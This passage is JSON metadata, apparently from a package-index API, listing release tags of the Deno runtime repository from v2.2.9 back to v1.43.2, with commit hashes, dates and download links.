","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releas